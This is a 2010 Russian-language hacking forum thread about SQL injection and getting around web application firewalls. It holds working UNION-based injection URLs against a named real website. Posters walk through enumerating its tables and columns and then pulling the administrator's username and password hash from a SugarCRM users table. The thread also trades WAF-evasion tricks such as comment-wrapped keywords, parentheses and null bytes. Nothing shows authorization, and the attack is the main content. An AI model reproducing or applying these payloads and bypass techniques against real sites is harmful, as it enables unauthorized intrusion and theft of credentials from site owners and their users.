15.10.2010, 09:59
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Ну и from+information_schema./*!tables*/
Да и вообще, не факт что там именно на .tables реагирует.
Поэтому или ссылку кидай или потестируй на каком этапе отрубает.
|
|
|
15.10.2010, 12:04
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 10
С нами:
8914809
Репутация:
0
|
|
буду использовать гугл прежде чем задавать вопросы
буду использовать гугл прежде чем задавать вопросы
буду использовать гугл прежде чем задавать вопросы
буду использовать гугл прежде чем задавать вопросы
буду использовать гугл прежде чем задавать вопросы
буду использовать гугл прежде чем задавать вопросы
буду использовать гугл прежде чем задавать вопросы
|
|
|
|
15.10.2010, 15:39
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами:
9610572
Репутация:
32
|
|
Сообщение от nullik
Стоит какой-то ваф с фильтрами на union,select и слово information_schema. Union и select обошел скобочками, а вот инф_схема никак не могу, выбрасывает на forbidden и всё тут. /**/ не помогает.
union(SELECT+1,table_name,3,4,5)from(iNformation_s chema.tabl%00es) Вот так не работает.
union(SELECT+1,version(),3,4,5) так работает.
Посоветуйте что-либо плиз.
Спасибо.
На локальной серваке следующие запросы вызывали ошибку:
(SELECT+1,table_name,3,4,5)from(iNformation_schema .tabl%00es)
(SELECT+1,table_name,3,4,5)from(iNformation_schema .tables)
а вот запрос
(SELECT+1,table_name,3,4,5 from iNformation_schema.tables)
прошел.
Кстати не понял почему такой запрос тоже вызвал ошибку
(SELECT+1,table_name,3,4,5 +from iNformation_schema.tables)
|
|
|
|
15.10.2010, 16:21
|
|
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
С нами:
8750657
Репутация:
65
|
|
Redwood, мне нужно слить определенные таблицы (например users)
|
|
|
|
15.10.2010, 23:26
|
|
Новичок
Регистрация: 06.07.2009
Сообщений: 18
С нами:
8867250
Репутация:
0
|
|
Приветсвую господа!
Столкнулся с такой траблой, прочитал все таблицы:
http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,group_concat%28table_name %29,5,6,7,8,9+from+information_schema.tables+where +table_schema=database%28%29+--+
затем прочитал колонки:
http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,group_concat%28column_nam e%29,5,6,7,8,9+from+information_schema.columns+whe re+table_name=0x7573657273+--+
но вывести данные которые нужно не могу, выводит лишь первую колонку:
http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,id_user,5,6,7,8,9+from+us ers+--+
а вывести user_name,user_hash не получается никак, я так понимаю это фильтруется, пробовал юзать CHAR, HEX, не пашет ((
Посоветуйте, пожалуйста!
П.С. Друзья а как вы боретесь с хостингом SWEB.RU который мешает проверять сайты на прочность ?
|
|
|
|
15.10.2010, 23:55
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
таблиц users несколько, в той базе с которой ты работаешь в этой таблице нет колонок user_name.
http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,group_concat%28column_nam e%29,5,6,7,8,9+from+information_schema.columns+whe re+table_name=0x7573657273%20and%20table_schema=0x 70726f70726f6a5f70726f70726f6a6563746f72+--+
user_name
http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,group_concat%28user_name% 29,5,6,7,8,9+from+proproj_sugarcrm.users+--+
|
|
|
|
16.10.2010, 00:05
|
|
Новичок
Регистрация: 09.02.2009
Сообщений: 23
С нами:
9079073
Репутация:
-9
|
|
Логин админа
http://www.pro-projector.ru/news_N.php?id_page=13+and+1=0+%20Union%20Select%20 %201,2,3,user_name,5,6,7,8,9%20from%20proproj_suga rcrm.users
Хеш пароля админа
http://www.pro-projector.ru/news_N.php?id_page=13+and+1=0+%20Union%20Select%20 %201,2,3,user_hash,5,6,7,8,9%20from%20proproj_suga rcrm.users
p.s. отображаются в теге title
|
|
|
|
16.10.2010, 00:11
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами:
9610572
Репутация:
32
|
|
Сообщение от grably
П.С. Друзья а как вы боретесь с хостингом SWEB.RU который мешает проверять сайты на прочность ?
Сам не сталкивался, а каким образом это проявляется?
|
|
|
|
16.10.2010, 00:18
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от mr.celt
Сам не сталкивался, а каким образом это проявляется?
Фаервол стоит, который проверяет запросы на наличие запрещенных слов (from, information_schema и еще каких-то) и редиректит на служебную страницу с сообщением, что запрос отвергнут
|
|
|
|
16.10.2010, 00:49
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами:
9610572
Репутация:
32
|
|
Сообщение от попугай
Фаервол стоит, который проверяет запросы на наличие запрещенных слов (from, information_schema и еще каких-то) и редиректит на служебную страницу с сообщением, что запрос отвергнут
Ну понятно, то есть какой-нибудь WAF стоит. Наверно и универсального решения тут не будет. Если это mod_security какой-нибудь, то есть пути обхода, начиная от простых вариантов типа /*!union*/ и т.д. Но если что-то более серьезное типа "Баракуды", которая специально нацелена на такого вида запросы, включая и работу с https, то тут все намного сложнее.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
